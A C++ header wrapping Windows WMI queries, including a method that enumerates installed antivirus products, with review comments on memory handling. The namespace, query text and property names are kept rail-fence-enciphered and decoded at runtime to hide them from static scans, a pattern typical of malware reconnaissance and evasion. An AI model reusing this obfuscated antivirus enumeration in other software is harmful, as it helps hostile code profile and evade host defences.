#pragma once
#include "WMIConnection.hpp"
#include "ExportInterface.hpp"
#include <any>
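// Thin wrapper over an already-initialised COM/WMI session that turns WMI
// query results into plain C++ containers.
//
// Review notes:
//  - The namespace, query and property-name literals in this class are kept
//    in an obfuscated form and decoded at runtime through IFind (IExport).
//    Comments below refer to them by the variable that receives the decoded
//    text; the decoded values are not reproduced here.
//  - Every query still goes through IWbemServices::ExecQuery, so it remains
//    observable to WMI-Activity / ETW tracing on the host regardless of how
//    the query text is stored in the binary.
//  - Lifetime: each IWbemClassObject handed out by IEnumWbemClassObject::Next
//    is released in the same loop iteration; BSTRs obtained from
//    SafeArrayGetElement are freed with SysFreeString.
class QueryInterface
{
public:
    // TRUE when both the COM wrapper and the WMI connection reported ready.
    BOOL IReady;

    // Binds to existing COM and WMI state; does not connect by itself.
    // @param com_wrapper    initialised COM wrapper (held by reference)
    // @param wmi_connetion  WMI connection; namespaces are switched lazily
    QueryInterface(COMWrapper& com_wrapper, WMIConnection& wmi_connetion) :
        IReady(FALSE), COM(com_wrapper), WMI(wmi_connetion)
    {
        if (COM.IReady && WMI.IReady)
            IReady = TRUE;
    }

    // Runs a WQL query and appends one name->value map per returned object.
    //
    // @param sQuery  WQL text, passed to ExecQuery unchanged
    // @param vOut    receives one std::map per object (existing entries are
    //                kept).  Types stored in std::any, by variant type:
    //                  VT_I4 -> long, VT_BSTR -> std::wstring, VT_UI4 -> unsigned long,
    //                  VT_UINT -> unsigned int, VT_I2 -> short, VT_DATE -> DATE,
    //                  VT_BOOL -> VARIANT_BOOL,
    //                  VT_I2|VT_ARRAY and VT_I4|VT_ARRAY -> std::vector<short>,
    //                  VT_UI4|VT_ARRAY -> std::vector<unsigned short>.
    //                Other variant types are not recorded.
    // @return E_FAIL when no namespace connection could be established;
    //         otherwise the HRESULT of ExecQuery, or of the
    //         IEnumWbemClassObject::Next call that ended the enumeration
    //         (WBEM_S_FALSE on a normal end, a failure code if Next failed).
    HRESULT Query(
        _In_ std::wstring sQuery,
        _Out_ std::vector< std::map<std::wstring, std::any> >& vOut)
    {
        if (!WMI.bConnected)
            WMI.ConnectToNamespace("RVOM2OITC\\", 0);
        if (!WMI.bConnected)
        {
            ILog("Failed to connect to namespace\n");
            return E_FAIL; // Something is very wrong
        }
        // NOTE(review): only the connected flag is checked here, not which
        // namespace is current, so a Query() issued after
        // QueryAntivirusProducts() runs against whatever namespace that call
        // selected.  Confirm whether WMIConnection re-targets on its own.

        ILog("Querying: %ls\n", sQuery.c_str());

        IEnumWbemClassObject* pEnumerator = NULL;
        HRESULT hres = WMI.pSvc->ExecQuery(_bstr_t(L"WQL"), _bstr_t(sQuery.c_str()),
            WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY,
            NULL,
            &pEnumerator);
        if (FAILED(hres))
            return hres;

        // Reused across objects; cleared at the top of every iteration so a
        // property of one object never carries over into the next map.
        std::map<std::wstring, std::any> properties;
        // Scratch vectors for array-valued properties (copied into the map).
        std::vector<short> vI16;
        std::vector<unsigned short> vU16;

        while (pEnumerator)
        {
            IWbemClassObject* pclsObj = NULL;
            ULONG uReturn = 0;
            hres = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn);
            if (0 == uReturn)
                break;                  // end of enumeration; hres is WBEM_S_FALSE
            if (FAILED(hres) || !pclsObj)
            {
                if (pclsObj)
                    pclsObj->Release();
                pEnumerator->Release();
                return FAILED(hres) ? hres : E_POINTER;
            }
            properties.clear();

            // Names of the object's own (non-system) properties.
            SAFEARRAY* pNames = NULL;
            HRESULT hr = pclsObj->GetNames(NULL, WBEM_FLAG_LOCAL_ONLY, NULL, &pNames);
            if (SUCCEEDED(hr) && pNames)
            {
                LONG lLBound = 0;
                LONG lUBound = 0;
                if (FAILED(SafeArrayGetLBound(pNames, 1, &lLBound)) ||
                    FAILED(SafeArrayGetUBound(pNames, 1, &lUBound)))
                    lUBound = lLBound - 1;  // treat as empty
                for (LONG i = lLBound; i <= lUBound; i++)
                {
                    BSTR bstr = NULL;
                    if (FAILED(SafeArrayGetElement(pNames, &i, &bstr)) || !bstr)
                        continue;
                    VARIANT vtProp;
                    VariantInit(&vtProp);
                    if (SUCCEEDED(pclsObj->Get(bstr, 0, &vtProp, 0, 0)))
                        StoreVariant(properties, bstr, vtProp, vI16, vU16);
                    VariantClear(&vtProp);  // frees any BSTR/SAFEARRAY owned by vtProp
                    SysFreeString(bstr);    // SafeArrayGetElement returned a copy we own
                }
                vOut.push_back(properties);
                SafeArrayDestroy(pNames);
            }
            pclsObj->Release();             // one object per Next(); release every round
        }
        pEnumerator->Release();
        return hres;
    }

    // Enumerates the registered antivirus products and appends one AVProduct
    // per result.  The namespace, the query text and each property name are
    // decoded at runtime; property reads that fail are skipped, reads that
    // return VT_NULL/VT_EMPTY are logged and skipped.
    //
    // @param pAVProducts receives the products (existing entries are kept)
    // @return E_FAIL when the namespace connection is missing, otherwise the
    //         HRESULT of ExecQuery.
    HRESULT QueryAntivirusProducts(
        _In_ std::vector<AVProduct>& pAVProducts)
    {
        // NOTE(review): currentNamespace is compared against the *encoded*
        // literal while ConnectToNamespace receives the same encoded text;
        // whether WMIConnection stores the encoded or decoded form is not
        // visible here - confirm, or this reconnects on every call.
        if (!WMI.currentNamespace || wcscmp(WMI.currentNamespace, L"RutOcrneOeierTStC2\\y") != 0)
            WMI.ConnectToNamespace("RutOcrneOeierTStC2\\y", 0);
        if (!WMI.bConnected)
        {
            ILog("Failed to connect to namespace\n");
            return E_FAIL; // Something is very wrong
        }

        // Decoded into a stack buffer so the early return below cannot leak it.
        WCHAR lpQuery[256] = {};
        IFind.railfence_wdecipher(5, L"S trE*FniPoL RAVsdETO iuutCMrc", lpQuery);

        IEnumWbemClassObject* pEnumerator = NULL;
        HRESULT hres = WMI.pSvc->ExecQuery(
            _bstr_t("WQL"),
            _bstr_t(lpQuery),
            WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY,
            NULL,
            &pEnumerator);
        if (FAILED(hres))
        {
            ILog("Query for antivirus products failed. Error code = 0x%lx\n", hres);
            return hres; // Program has failed.
        }

        while (pEnumerator)
        {
            IWbemClassObject* pclsObj = NULL;
            ULONG uReturn = 0;
            HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn);
            if (0 == uReturn || FAILED(hr) || !pclsObj)
            {
                if (pclsObj)
                    pclsObj->Release();
                break;
            }

            AVProduct avProduct;

            // Reads one string property into `dest`.  `notSetMsg` is logged
            // when the property exists but holds VT_NULL/VT_EMPTY; a failed
            // Get() is silent, as before.  Non-BSTR values are left unassigned
            // instead of reinterpreting the union as a pointer.
            auto readBstr = [&](LPCWSTR encodedName, auto& dest, const char* notSetMsg)
            {
                VARIANT vtProp;
                HRESULT rc = ReadProperty(pclsObj, encodedName, vtProp);
                if (rc == S_FALSE)
                    ILog(notSetMsg);
                else if (rc == S_OK)
                {
                    if (vtProp.vt == VT_BSTR)
                        dest = vtProp.bstrVal;      // copy before VariantClear frees it
                    VariantClear(&vtProp);
                }
            };

            // displayName
            readBstr(L"daiNmsyepal", avProduct.displayName, "Property displayName is not set\n");
            // instanceGuid
            readBstr(L"iGneuscitnda", avProduct.instanceGuid, "Property is not set\n");
            // productState (numeric)
            {
                VARIANT vtProp;
                HRESULT rc = ReadProperty(pclsObj, L"ptrSaottdceu", vtProp);
                if (rc == S_FALSE)
                    ILog("Property is not set\n");
                else if (rc == S_OK)
                {
                    // VT_I4/VT_UI4/VT_UINT share storage; anything else is ignored.
                    if (vtProp.vt == VT_I4 || vtProp.vt == VT_UI4 || vtProp.vt == VT_UINT)
                        avProduct.productState = vtProp.uintVal;
                    VariantClear(&vtProp);
                }
            }
            // pathToSignedProductExe
            readBstr(L"pguaindctSeothodrEeTPx", avProduct.pathSignedExe, "Property is not set\n");
            // pathToSignedReportingExe
            readBstr(L"pgrainotetSepixhodenETRg", avProduct.pathReportingExe, "Property is not set\n");
            // timestamp
            readBstr(L"tpimmaets", avProduct.timestamp, "Property is not set\n");

            pAVProducts.push_back(avProduct);
            pclsObj->Release();             // one object per Next(); release every round
        }
        pEnumerator->Release();
        return hres;
    }

private:
    WMIConnection& WMI;
    COMWrapper& COM;
    IExport IFind;

    // Decodes `encodedName` with IFind and reads that property of pObj into
    // vtProp (VariantInit'ed here).
    // @return S_OK when the property holds a value (caller must VariantClear),
    //         S_FALSE when it is VT_NULL/VT_EMPTY (already cleared here), or
    //         the failing HRESULT from IWbemClassObject::Get.
    HRESULT ReadProperty(IWbemClassObject* pObj, LPCWSTR encodedName, VARIANT& vtProp)
    {
        WCHAR name[256] = {};
        IFind.railfence_wdecipher(5, encodedName, name);
        VariantInit(&vtProp);
        HRESULT hr = pObj->Get(name, 0, &vtProp, 0, 0);
        if (FAILED(hr))
            return hr;
        if (vtProp.vt == VT_NULL || vtProp.vt == VT_EMPTY)
        {
            VariantClear(&vtProp);
            return S_FALSE;
        }
        return S_OK;
    }

    // Copies one VARIANT into `properties` under `name`, choosing the stored
    // C++ type by vt.  Array payloads are copied out because VariantClear()
    // frees vtProp.parray afterwards; storing the raw SAFEARRAY* would leave a
    // dangling pointer in the map.  vI16/vU16 are caller-owned scratch vectors.
    static void StoreVariant(std::map<std::wstring, std::any>& properties,
                             BSTR name, const VARIANT& vtProp,
                             std::vector<short>& vI16,
                             std::vector<unsigned short>& vU16)
    {
        switch (vtProp.vt)
        {
        case VT_I4:
            properties[name] = vtProp.lVal;
            break;
        case VT_BSTR:
            // A VT_BSTR may carry a null pointer; std::wstring(nullptr) is UB.
            properties[name] = std::wstring(vtProp.bstrVal ? vtProp.bstrVal : L"");
            break;
        case VT_UI4:
            properties[name] = vtProp.ulVal;
            break;
        case VT_UINT:
            properties[name] = vtProp.uintVal;
            break;
        case VT_I2:
            properties[name] = vtProp.iVal;
            break;
        case VT_DATE:
            properties[name] = vtProp.date;
            break;
        case VT_BOOL:
            properties[name] = vtProp.boolVal;
            break;
        case VT_I2 | VT_ARRAY:
            vI16.clear();
            CopyArray<short, short>(vtProp.parray, vI16);
            properties[name] = vI16;
            break;
        case VT_I4 | VT_ARRAY:
            // Historical container type is vector<short>; 32-bit elements are
            // narrowed so existing any_cast<std::vector<short>> callers keep working.
            vI16.clear();
            CopyArray<LONG, short>(vtProp.parray, vI16);
            properties[name] = vI16;
            break;
        case VT_UI4 | VT_ARRAY:
            vU16.clear();
            CopyArray<ULONG, unsigned short>(vtProp.parray, vU16);
            properties[name] = vU16;
            break;
        case VT_UINT | VT_ARRAY:
        case VT_UI2 | VT_ARRAY:
        default:
            break;  // unsupported type: property is not recorded
        }
    }

    // Reads every element of a one-dimensional SAFEARRAY of Elem into `out`,
    // narrowing to Stored.  Iteration stays inside the array's real bounds;
    // elements equal to zero are skipped (the behaviour callers already see).
    template <typename Elem, typename Stored>
    static void CopyArray(SAFEARRAY* psa, std::vector<Stored>& out)
    {
        if (!psa)
            return;
        LONG lo = 0;
        LONG hi = 0;
        if (FAILED(SafeArrayGetLBound(psa, 1, &lo)) ||
            FAILED(SafeArrayGetUBound(psa, 1, &hi)))
            return;
        for (LONG j = lo; j <= hi; j++)
        {
            Elem e = 0;
            if (SUCCEEDED(SafeArrayGetElement(psa, &j, &e)) && e != 0)
                out.push_back(static_cast<Stored>(e));
        }
    }
};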